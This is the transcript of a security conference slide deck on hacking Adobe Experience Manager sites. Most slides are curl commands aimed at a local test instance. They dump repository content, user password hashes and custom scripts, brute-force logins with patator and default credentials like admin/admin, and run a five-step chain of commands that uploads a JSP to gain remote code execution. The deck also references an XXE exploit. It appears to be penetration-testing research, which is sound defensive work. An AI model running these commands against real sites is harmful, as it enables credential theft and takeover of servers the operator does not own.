hacking adobe experience manager sites
TRANSCRIPT
Hack1ng Adobe Experience
Manager sites
• Mikhail Egorov
• Security researcher
• Works in Odin (Parallels)
• 0ang3el (at) gma1l (d0t) com
Who is that guy?
• http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/
• http://www.slideshare.net/CQCON/prsentation-ben-zahler
• https://docs.adobe.com/docs/en/aem/6-0/administer/security/security-checklist.html
Related Work
• Sensitive information from JCR
• Installed OSGI bundles
• Custom scripts
• Usernames
• Password hashes
• Elements that allow anonymous modification
What do we want
• Use JsonRendererServlet
Sensitive information from JCR
curl -X “GET” http://127.0.0.1:8080/.json
curl -X “GET” http://127.0.0.1:8080/.6.json
curl -X “GET” http://127.0.0.1:8080/.tidy.6.json
curl -X “GET” http://127.0.0.1:8080/.tidy.infinity.json
• List of all bundles
• QueryBuilder is your friend! http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html
Installed OSGI bundles
curl -X “GET” http://127.0.0.1:8080/bin.tidy.infinity.json
curl -X “GET” http://127.0.0.1:8080/bin/querybuilder.json
• List customs scripts
• List compiled custom scripts from cache
Custom scripts
curl -X “GET” http://127.0.0.1:8080/apps.tidy.infinity.json
curl -X “GET” http://127.0.0.1:8080/var/classes.tidy.infinity.json
• Dump content node properties
• Use regular expression to extract usernames (pipe with prev command)
Usernames
curl -X “GET” http://127.0.0.1:8080/content.infinity.json
python -c 'import sys,re; print "\n".join([m.group(1) for m in
re.finditer("\".+?By\":\"(.+?)\"",sys.stdin.readlines()[0])])' |
sort –u
• Use QueryBuilder bundle
Password hashes
curl -X “GET”
http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=sel
ective&p.properties=rep:principalName%20rep:password&p.limit=100
• Dump content node properties
• Use regular expression to check (pipe with prev command)
Anonymous modification
curl -X “GET” http://127.0.0.1:8080/content.infinity.json
python -c 'import sys,re; m =
re.search("\".+?By\":\"anonymous\"",sys.stdin.readlines()[0]); print
"Anon modification: ","Yes" if m else "No"'
• Try default user credentials: admin/admin, author/author, anonymous/anonymous
• Offline attack (brute hashes)
• Online attack (POST servlet bundle)
Getting access
patator http_fuzz url=http://127.0.0.1:8080/content/fake.json
method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt
auth_type=basic -x ignore:code!=200 --threads 5
• XSS
• CSRF
• DoS
• Read local files
• RCE
You have access, now what?
Not covered, sorry!
• CVE-2015-1833 ( http://seclists.org/oss-sec/2015/q2/518 )
• Webdav OSGI bundle uses XML parser that is not properly initialized
• Exploit - https://www.exploit-db.com/exploits/37110/
Webdav bundle, XXE
• Out-of-bound exploitationhttp://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
• Pros: works with anonymous credentials
• Cons: you need external server, instable
• Inbound exploitation• Pros: you do not need external server, more stable
• Cons: you need credentials of the user that is able to modify some node in JCR
Webdav bundle, XXE
http://www.youtube.com/watch?v=Hg3AXoG89Gs
Webdav bundle, XXE Demo
• We have node – http://127.0.0.1:8080/rce
• We have script exec.jsp that is magically loaded into node –http://127.0.0.1:8080/apps/rcetype
• When someone navigates to http://127.0.0.1:8080/rce.exec our exec.jsp will be executed.
Remote code execution
{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38
GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:crea
ted":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}
{"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}
• Step I: Create rcetype node
Remote code execution
curl –u admin:admin –Fjcr:primaryType=nt:folder
http://127.0.0.1:8080/content/rcetype
• Step II: Upload script exec.jsp to rcetype node
Remote code execution
curl –u admin:admin –[email protected]
http://127.0.0.1:8080/content/rcetype
• Step III: Copy rcetype to /apps
Remote code execution
curl –u admin:admin –F:operation=copy –F:dest=/apps/rcetype
http://127.0.0.1:8080/content/rcetype
• Step IV: Create rce node bound to rcetype
Remote code execution
curl –u admin:admin –Fsling:resourceType=rcetype
http://127.0.0.1:8080/content/rce
• Step V: Launch jsp script
Remote code execution
curl –X “GET” http://127.0.0.1:8080/content/rce.exec
http://www.youtube.com/watch?v=Z9n2T07e6Ls
Remote code execution, Demo
Ask a Ninja